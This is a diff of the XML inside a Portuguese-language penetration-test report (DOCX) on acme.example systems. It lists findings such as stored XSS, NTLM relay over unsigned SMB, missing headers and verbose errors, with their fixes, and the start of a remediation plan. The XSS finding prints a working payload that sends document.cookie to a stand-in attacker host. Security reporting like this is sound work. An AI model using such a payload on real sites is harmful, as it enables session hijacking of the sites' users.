+        <w:t>Payloads persistem no campo de comentário de avaliação e executam no contexto de outros usuários, permitindo roubo de sessão e ações em nome da vítima.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
-        <w:spacing w:after="0" w:before="20"/>
+        <w:spacing w:before="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3808,28 +4073,27 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">Payload persistente em avaliação de produto</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>Payload persistente em avaliação de produto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;img src=x onerror="fetch('https://c2.teste/'+document.cookie)"&gt;</w:t>
+        <w:t>&lt;img src=x onerror="fetch('https://c2.teste/'+document.cookie)"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3849,13 +4113,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sequestro de sessão de clientes e potencial fraude.</w:t>
+        <w:t>Sequestro de sessão de clientes e potencial fraude.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3875,15 +4139,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
+        <w:t>Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3903,13 +4167,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">MÉDIO</w:t>
+        <w:t>MÉDIO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3919,13 +4183,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 5.9 · MITRE T1557.001 · Rede · Afetado: 10.20.0.0/16</w:t>
+        <w:t>CVSS 5.9 · MITRE T1557.001 · Rede · Afetado: 10.20.0.0/16</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3936,13 +4200,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hosts sem assinatura SMB permitem o relay de autenticação NTLM, viabilizando autenticação como a vítima em outros serviços.</w:t>
+        <w:t>Hosts sem assinatura SMB permitem o relay de autenticação NTLM, viabilizando autenticação como a vítima em outros serviços.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3962,13 +4226,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Movimentação lateral e acesso não autorizado a recursos de rede.</w:t>
+        <w:t>Movimentação lateral e acesso não autorizado a recursos de rede.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3988,15 +4252,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
+        <w:t>Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4016,13 +4280,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">BAIXO</w:t>
+        <w:t>BAIXO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4032,13 +4296,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 3.7 · CWE-693 · Configuração · Afetado: loja.acme.example, api.acme.example</w:t>
+        <w:t>CVSS 3.7 · CWE-693 · Configuração · Afetado: loja.acme.example, api.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -4049,13 +4313,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ausência de cabeçalhos como HSTS, X-Content-Type-Options e CSP, além de suites TLS legadas habilitadas.</w:t>
+        <w:t>Ausência de cabeçalhos como HSTS, X-Content-Type-Options e CSP, além de suites TLS legadas habilitadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -4075,13 +4339,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Facilita ataques de downgrade, sniffing e injeção de conteúdo.</w:t>
+        <w:t>Facilita ataques de downgrade, sniffing e injeção de conteúdo.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4101,15 +4365,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
+        <w:t>Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4129,13 +4393,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">BAIXO</w:t>
+        <w:t>BAIXO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4145,13 +4409,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 3.1 · CWE-209 · Aplicação Web · Afetado: api.acme.example</w:t>
+        <w:t>CVSS 3.1 · CWE-209 · Aplicação Web · Afetado: api.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -4162,13 +4426,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Respostas de erro expõem stack traces e versões de componentes, auxiliando o atacante na construção de exploits.</w:t>
+        <w:t>Respostas de erro expõem stack traces e versões de componentes, auxiliando o atacante na construção de exploits.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -4188,13 +4452,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Reduz o esforço de reconhecimento do atacante.</w:t>
+        <w:t>Reduz o esforço de reconhecimento do atacante.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="2563EB" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4214,15 +4478,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
+        <w:t>Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4242,13 +4506,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">INFO</w:t>
+        <w:t>INFO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4258,13 +4522,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 0.0 · CWE-200 · Configuração · Afetado: loja.acme.example</w:t>
+        <w:t>CVSS 0.0 · CWE-200 · Configuração · Afetado: loja.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -4275,13 +4539,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Banners de serviço revelam versões exatas de nginx e do runtime, úteis para correlação com CVEs.</w:t>
+        <w:t>Banners de serviço revelam versões exatas de nginx e do runtime, úteis para correlação com CVEs.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -4301,13 +4565,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Informativo; contribui para o reconhecimento.</w:t>
+        <w:t>Informativo; contribui para o reconhecimento.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="64748B" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -4327,12 +4591,12 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:t>Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4342,13 +4606,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 6</w:t>
+        <w:t>SEÇÃO 6</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -4360,7 +4624,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Plano de Ação</w:t>
+        <w:t>Plano de Ação</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4374,12 +4638,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Roteiro priorizado por risco e esforço. Os quick wins (alto impacto, baixo esforço) vêm primeiro; o gráfico de prazos mostra o que leva mais e menos tempo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Roteiro priorizado por risco e esforço. Os quick wins (alto impacto, baixo esforço) vêm primeiro; o gráfico de prazos mostra o que leva mais e menos tempo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4389,20 +4653,23 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Roteiro de remediação</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80" w:before="80"/>
+        <w:t>Roteiro de remediação</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="80"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6091F1D7" wp14:editId="59F7B679">
             <wp:extent cx="5715000" cy="619125"/>
-            <wp:effectExtent t="0" r="0" b="0" l="0"/>
-            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1185062691" name="Picture 1185062691"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4410,13 +4677,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="none"/>
+                    <a:blip r:embed="rId14"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -4440,41 +4707,57 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="4621"/>
+        <w:gridCol w:w="5125"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2012FB" wp14:editId="5C84E48C">
                   <wp:extent cx="2571750" cy="2571750"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="169681822" name="Picture 169681822"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -4482,13 +4765,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18" cstate="none"/>
+                          <a:blip r:embed="rId15"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -4513,24 +4796,28 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="40"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="80" w:before="80"/>
+              <w:spacing w:before="80" w:after="80"/>
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7140C5FE" wp14:editId="5CF89A22">
                   <wp:extent cx="2857500" cy="1800225"/>
-                  <wp:effectExtent t="0" r="0" b="0" l="0"/>
-                  <wp:docPr id="1" name="" descr="" title=""/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="2067895137" name="Picture 2067895137"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -4538,13 +4825,13 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="" descr=""/>
+                          <pic:cNvPr id="0" name=""/>
                           <pic:cNvPicPr>
                             <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19" cstate="none"/>
+                          <a:blip r:embed="rId16"/>
                           <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
@@ -4571,7 +4858,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4581,42 +4868,53 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Itens de correção priorizados</w:t>
+        <w:t>Itens de correção priorizados</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="E2E8F0" w:sz="4"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="1560"/>
+        <w:gridCol w:w="682"/>
+        <w:gridCol w:w="4970"/>
+        <w:gridCol w:w="1072"/>
+        <w:gridCol w:w="780"/>
+        <w:gridCol w:w="682"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="pct" w:w="16%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+            <w:tcW w:w="800" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4628,19 +4926,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Janela</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="7%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Janela</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="350" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -4652,19 +4950,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">ID</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="51%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
